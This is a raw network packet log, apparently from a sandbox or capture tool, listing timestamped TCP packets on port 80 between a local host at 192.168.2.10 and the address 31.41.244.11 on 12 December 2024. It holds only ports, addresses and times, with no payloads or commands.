Dec 12, 2024 16:48:38.262856960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.262870073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.262902021 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.263942957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.263948917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.264028072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.265067101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.265083075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.265227079 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.266025066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.266088009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.266093969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.266331911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.267112970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.267203093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.267234087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.267277002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.268218994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.268304110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.268332005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.268371105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.269496918 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.269504070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.269551992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.271018982 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.271147966 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.406984091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.407120943 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.407169104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.407341003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.407469988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.407581091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.407588005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.407617092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.408581972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.408636093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.408727884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.408773899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.409600019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.409651041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.409723043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.409980059 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.410656929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.410769939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.410820961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.411741972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.411844015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.411861897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.411886930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.412863016 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.412945032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.412950039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.412997961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.413882017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.413980007 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.414037943 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.414975882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.415086985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.415143013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.416007042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.416069031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.416106939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.416280985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.417077065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.417224884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.417280912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.418140888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.418271065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.418281078 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.418458939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.419274092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.419362068 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.419434071 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.419496059 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.420315027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.420366049 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.420411110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.420500994 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.421509981 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.421566963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.421587944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.421629906 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.422446966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.422493935 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.422514915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.422538996 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.423526049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.423568964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.423621893 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.424683094 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.424824953 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.424879074 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.425652027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.425800085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.425846100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.426835060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.427062988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.427109003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.427186012 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.427853107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.427911043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.427953005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.427994967 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.428977013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.429069042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.429100037 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.429117918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.429902077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.430028915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.430054903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.430078030 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.430969954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.431067944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.431092978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.431114912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.432045937 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.432152033 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.432586908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.433104038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.433329105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.433428049 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.434195042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.434238911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.434286118 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.435276031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.435384035 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.435431004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.435517073 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.436433077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.436490059 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.436572075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.436990976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.437519073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.437613010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.437664032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.438474894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.438606977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.438658953 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.439526081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.439644098 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.439655066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.439887047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.440711975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.440732002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.440785885 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.441668987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.441775084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.441840887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.442790031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.442883015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.442950010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.443809032 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.443861961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.443892002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.443973064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.444921970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.444972992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.445022106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.445991993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.446132898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.446182013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.447078943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.447248936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.447298050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.448137045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.448221922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.448246956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.448299885 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.449217081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.449352026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.449403048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.450334072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.450457096 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.450531006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.450721025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.451567888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.451638937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.451702118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.451749086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.452455044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.452569962 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.452641964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.452683926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.453564882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.453638077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.453685045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.454617023 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.454665899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.454732895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.455610991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.455642939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.455660105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.455718994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.455784082 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.456651926 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.456703901 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.456743002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.456784964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.457734108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.457779884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.457953930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.458163977 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.458842039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.458911896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.458962917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.459917068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.459966898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.460051060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.461193085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.461241961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.461266994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.461764097 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.462052107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.462116003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.462167025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.462217093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.463054895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.463120937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.599267960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.599337101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.599419117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.599452019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.599638939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.599653959 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.599725962 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.600590944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.600658894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.600728989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.600773096 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.601640940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.601756096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.601804018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.602719069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.602823019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.602875948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.603851080 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.603888988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.603935003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.604831934 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.604919910 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.604943037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.604984999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.605935097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.606031895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.606081963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.607212067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.607223988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.607275009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.608088017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.608267069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.608315945 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.609107018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.609184027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.609230995 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.610722065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.610855103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.610862970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.610918045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.611947060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.612040043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.612062931 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.612160921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.613724947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.613851070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.613903999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.614671946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.614806890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.614852905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.615566969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.615607977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.615634918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.615653992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.616379023 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.616456985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.616511106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.617489100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.617537975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.617664099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.617712021 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.618596077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.618721008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.618725061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.618769884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.619779110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.619910955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.619965076 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.620685101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.620743036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.620806932 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.620857954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.621711969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.621769905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.621797085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.621855974 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.622865915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.622910023 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.623040915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.623092890 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.623842001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.623930931 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.623979092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.624975920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.625036955 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.625185966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.625247002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.625771999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.625832081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.625889063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.626633883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.626732111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.626790047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.627455950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.627504110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.627556086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.628407955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.628496885 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.628554106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.629440069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.629545927 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.629604101 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.630762100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.630772114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.630825043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.631648064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.631695032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.631725073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.631844997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.632693052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.632771969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.632797003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.632812023 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.633797884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.633904934 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.633958101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.634058952 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.634881973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.634985924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.635062933 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.635957003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.636004925 CET	49931	80	192.168.2.10	31.41.244.11
